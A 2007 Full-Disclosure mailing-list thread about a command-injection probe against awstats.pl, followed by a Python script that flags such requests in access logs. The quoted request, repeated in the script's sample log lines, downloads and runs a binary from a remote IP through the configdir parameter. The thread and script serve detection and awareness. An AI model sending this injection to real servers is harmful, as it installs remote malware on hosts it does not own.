Now, I can't read Japanese but this looks similar: http://d.hatena.ne.jp/naablaa/20071121

also, this http://forums.techarena.in/showthread.php?t=856173
related to this http://www.sophos.com/security/analyses/trojkaitenw.html

all pretty recent, as I can see now, that barbut file is missing from the server in your post,

On Wednesday 21 November 2007 09:44:25 pm Simon Smith wrote:
> Vladis,
> Got that right... this vulnerability was released ages ago if memory
> serves right. What's funny is that I am not using a Linux host and I do
> not use awstats anyway... makes the attack even more pathetic.
>
> [EMAIL PROTECTED] wrote:
> > On Wed, 21 Nov 2007 14:20:22 EST, Simon Smith said:
> >> Anyone else seen these really 3l337 attacks?
> >>
> >> GET
> >> /stats/awstats.pl?configdir=|echo;cd%20/tmp;wget%2085.114.128.21/barbut;
> >>chmod%20755%20barbut;./barbut;echo|
> >>
> >> gotta love script kids...
> >
> > The truly sad part is that the script apparently still works often enough
> > that the script kids are still using it, rather than saying "that one's
> > crap, it never gets me a box".
> >
> > One has to wonder what level of pwnage exists on boxes that are *still*
> > vulnerable to this one - they may actually be reaching win98-style
> > equilibrium. They're old enough that everybody's hit them already, and
> > are probably running software *so* ancient that it's actually before most
> > of the current crop of vulnerabilities were discovered.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
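
For anyone wanting to see how often this probe hits their own servers, here is a small log check, added as an example and not part of the thread above: it URL-decodes the `configdir` parameter of any `awstats.pl` request and flags values containing shell metacharacters. The log lines are constructed (only the request in the first one is the one quoted in the thread); the client addresses, the log format and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Characters a legitimate configdir (a directory path) never needs.
SHELL_META = re.compile(r"[|;&`$<>\n]")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_configdir(log_line):
    """Return the decoded configdir value if it looks like command
    injection against awstats.pl, otherwise None."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    try:
        url = urlsplit(m.group(1))
    except ValueError:          # malformed request target
        return None
    if not url.path.lower().endswith("awstats.pl"):
        return None
    # Split by hand on '&' only: the probe uses ';' inside the value.
    for pair in url.query.split("&"):
        key, _, value = pair.partition("=")
        if unquote_plus(key).lower() == "configdir":
            decoded = unquote_plus(value)   # decode once, as the server does
            if SHELL_META.search(decoded):
                return decoded
    return None

def scan(lines):
    """Return (client_ip, decoded_value) for every flagged line."""
    hits = []
    for line in lines:
        value = suspicious_configdir(line)
        if value is not None:
            hits.append((line.split()[0], value))
    return hits

# Constructed access-log lines (combined-log style, documentation addresses).
LOG = [
    '192.0.2.10 - - [21/Nov/2007:14:20:22 -0500] "GET /stats/awstats.pl?configdir=|echo;cd%20/tmp;wget%2085.114.128.21/barbut;chmod%20755%20barbut;./barbut;echo| HTTP/1.0" 404 312',
    '192.0.2.11 - - [21/Nov/2007:14:21:03 -0500] "GET /cgi-bin/awstats.pl?config=example.org&configdir=/etc/awstats HTTP/1.1" 200 5120',
    '192.0.2.12 - - [21/Nov/2007:14:22:40 -0500] "GET /awstats/awstats.pl?configdir=%7Cecho%7C HTTP/1.1" 404 312',
    '192.0.2.13 - - [21/Nov/2007:14:23:11 -0500] "GET /index.html HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for ip, value in scan(LOG):
        print(ip, repr(value))
```

A 404 on a flagged line, as in the thread, means the host was only probed; a 200 on one is the case worth investigating.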
